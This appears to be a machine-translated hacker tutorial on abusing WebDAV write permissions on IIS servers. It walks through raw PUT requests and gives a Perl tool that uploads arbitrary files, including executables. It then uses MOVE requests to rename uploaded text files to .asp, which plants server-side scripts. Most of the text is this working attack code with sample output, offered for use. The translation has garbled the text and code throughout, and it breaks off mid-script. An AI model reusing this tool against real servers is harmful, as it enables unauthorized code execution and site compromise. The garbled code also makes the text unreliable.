Utilization of IIS write access

Author: SuperHei you may have seen "remote analysis IIS settings", which for a variety of settings iis analyzed, I am here to write permissions iis to analysis, the following reference "remote analysis IIS settings" article written permission of iis Analysis Content: Writing Permissions Test a directory for WEB users have write permissions, using the following methods: Telnet to the server's web port (80) and send a request:

Put /DIR/MY_FILE.TXT HTTP / 1.1HOST: IIS-ServerContent-length: 10 At this time, the server will return a 100 (continued) information:

HTTP / 1.1 100 ContinueServer: Microsoft-IIS / 5.0Date: THU, 28 Feb 2002 15:56:00 GMT Next, we enter 10 letters:

After the AAAAAAAAAA is sent out, see the server's return information, if it is a 201 CREATED response:

HTTP / 1.1 201 CreatedServer: Microsoft-IIS / 5.0Date: THU, 28 Feb 2002 15:56:08 gmtlocation: http://iis-server/dir/my_file.txtcontent-length: 0Allow: Options, Trace, Get, Head , Delete, put, copy, hove, protfind, proppatch, search, lock, unlock, then explain the write authority of this directory is open, but if the return is a 403 error, then write permissions are not open, if You need you to authenticate and return a 401 (permission prohibition) response, which is written permission, but anonymous users are not allowed. If a directory has also opened "Write" and "Script and Executable Programs", then web users can upload a program and execute it, horror oh% ^ # $! ~ Here is a brief description:

PUT /DIR/MY_FILE.TXT HTTP / 1.1HOST: IIS-ServerContent-Length: 10 PUT: Request the server to store the entity of the attachment in the supplied request URL, if the request URL points to the resource already exists, the accessory entity should be See the modified version of the resource on the current original server. If the request URL does not point to the existing resource, the URL will be defined by the requested user agent into a new resource, and the original server will use this URL to generate this resource. Host: is the send address of the HTTP request. Content-length: is the length of the content, the length of the final value, the length of the uploaded file size is uniform, and we write a simple Perl program here to complete This complex submission process, when we write the code, we open the file in a binmode () mode, the code is as follows:

#! / usr / bin / perluse IO :: Socket; $ argc = @argv; if ($ argc! = 4) {print "USAGE: $ 0 127.0.0.1 80 kaka.exe /scripts/file.exe/n"; EXIT;} $ host = @argv [0]; $ port = @argv [1]; $ file = @argv [2]; $ path = @argv [3]; @ s = stat ("$ file"); $ SIZE = $ s [7]; # get file size Print "$ file size is $ limited bytes / n"; MY $ SOCK = IO :: Socket :: inet-> new (proto => "tcp", peeraddr = > $ host, peerport => $ port) || Die "Sorry! Could Not connect to $ host / n"; Print $ SOCK "PUT $ PATH HTTP / 1.1 / N"; Print $ SOCK "HOST: $ Host / N "; Print $ SOCK" Content-Length: $ SIZE / N / N "; #Sock Connect Open (File," $ File "); binmode (file); # with 2-way open file While (READ (File, $ Char, 1024)) {# read file data Upload Print $ SOCK "$ char";} Print $ SOCK "/ N / N"; @REQ = <$ sock>; print "please wait ... / n"; Sleep (2); if ($ REQ [4] = ~ / 200 | 201 /) {Print "Upfile succeed !!!"; # 成 成 显示} else {print "Upfile faile !!! / n / n"; print @Req; # If the failed display returns an error} Close $ SOCK; Close File; below We test: c: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.txt /scripts/kaka.txtkaka.txt Size IS 14 BYTESPLEASE WAIT ... UPFILE SUCCEED !!! C: / INETPUB / SCRIPTS> DIR The volume in kaka.txt drive c does not have a label. The serial number of the volume is 3CD1-479E C: / INETPUB / SCRIPTS directory 2004-05-05 00:37 14 kaka.txt1 file 14-byte 0 directory 3,871,080,448 available bytes Here we have successfully uploaded Kaka.txt to the web Under the catalog Scripts, I used the binmode () mode (2) to open the file in the program, you should be able to upload other files, let's test the exe file:

C: / usr / bin> Perl.exe iiswt.pl 127.0.0.1 80 perl.exe /scripts/perl.exeperl.exe size is 20535 bytesplease wait ... Upfile successd !!! C: / inetpub / scripts> Dir Perl The volume in the .exe driver C does not have a label. The serial number of the volume is 3 cd1-479e c: / inetpub / scripts directory 2004-05-05 00:42 20,535 Perl.exe1 file 20,535 bytes 0 directory 3,871,031,296 can be successfully used, can upload EXE, is it possible? Upload any file? Then test the ASP file: C: / usr / bin> Perl.exe Iiswt.pl 127.0.0.1 80 kaka.asp /scripts/kaka.aspkaka.asp size is 4 bytesplease wait ... Upfile faile !!! http / 1.1 100 ContinueServer: Microsoft-IIS / 5.0Date: Tue, 04 May 2004 16:45:51 GMT HTTP / 1.1 403 ForbiddenServer: Microsoft-IIS / 5.0Date: Tue, 04 May 2004 16:45:51 GMTCONNECTION: CloseContent-Type: TEXT / HTMLCONTENT-Length: 44

http / 1.1 403 forbidden failed! ! Tip http / 1.1 403 Forbidden error, it seems that it is not possible to write ASP directly in Post mode. If it is tested, it will generate an HTTP / 1.1 403 forbidden error. Then how can we upload the file type file supported by IIS? In addition to the action of PUT, POST, GET, IIS can execute commands, huh! We can first upload local ASP to other files such as TXT below the remote host web directory, and will be changed to the ASP. We still submit tests with NC: d: /> NC 127.0.0.1 80Move /scripts/kaka.txt http / 1.1host: http:0.1destination: http://127.0.0.1/scripts/kaka.asp http / 1.1 201 CreatedServer: Microsoft-IIS / 5.0Date: Sun, 05 Oct 2003 09:30:59 GMTLOCATION: http://127.0.0.1/scripts/x.aspcontent-type: TEXT / XMLCONTENT-Length: 0 Successfully Use Move / Scripts / kaka.txt rename /scripts/kaka.asp. This way we can combine PUT and MOVE to complete the IIS write easy file :). We still use Perl to do. Test written ASP success:

C: / usr / bin> Perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp************************* **************************************************** CODZ BY ≯superhei && LANKER *********************************************************** ********** KAKA.ASP Size IS 4 BYTESPLEASE WAIT ... UPFILE SUCCEED !!! ModifyFile success !!! The final IiSWRITE.PL code is as follows (when writing this article, the Internet cafes for the article It is the first to play "draft", and the LANKER test and finally completed, THX LANKER.):

#! / usr / bin / perl # The Iiswrite Script Use IO :: Socket; $ argc = @argv; print "*" x 60; print "/ ncoDZ by ≯superhei && lanker / N "; Print" * "x 60," / n "; if ($ argc! = 4) {Print" USAGE: $ 0 127.0.0.1 80 kaka.txt /scripts/my_file.txt/N "; exit;} $ host = @argv [0]; $ port = @argv [1]; $ path = @argv [3]; $ file = @argv [2]; @ path = split ("/", $ path); $ Any = POP (@Path); $ PATH1 = JOIN ("/", @ PATH); @ s = stat ("$ file"); $ size = $ s [7]; print "$ file size is $ size bytes / N "; MY $ SOCK = IO :: Socket :: inet-> new (proto =>" tcp ", peeraddr => $ host, peerport => $ port) || DIE" Sorry! Could Not connect to $ Host / N "; Print $ SOCK" PUT $ PATH1 / LANKER.TXT HTTP / 1.1 / N "; Print $ SOCK" HOST: $ Host / N "; Print $ SOCK" Content-Length: $ SIZE / N / N "; Open (File, $ File ") || Die" Can't Open $ File "; binmode (file); WHILE (Read (File, $ Char, 1024)) {Print $ SOCK" $ char ";} print $ SOCK "/ N / N"; @ req = <$ sock>; print "please wait ... / n"; SLEEP (2); if ($ REQ [4] = ~ / 200 | 201 /) {print " Upfile succeed !!! / n ";} else {print" Upfile faile !!! / n ";} close file; close file ; $ sock = IO :: Socket :: inet-> new (proto => "tcp", peeraddr => $ host, peerport => $ port) || DIE "Sorry! Could Not connect to $ host / n" Print $ SOCK "Move $ Path1 / LANKER.TXT HTTP / 1.1 / N"; Print $ SOCK "Host: $ Host / N"; Print $ SOCK DESTINATION: http: // $ host: $ port $ PATH / N / N / N / N "; @ req = <$ sock>; if ($ REQ [0] = ~ / 20 / d | /) {Print" Modify ","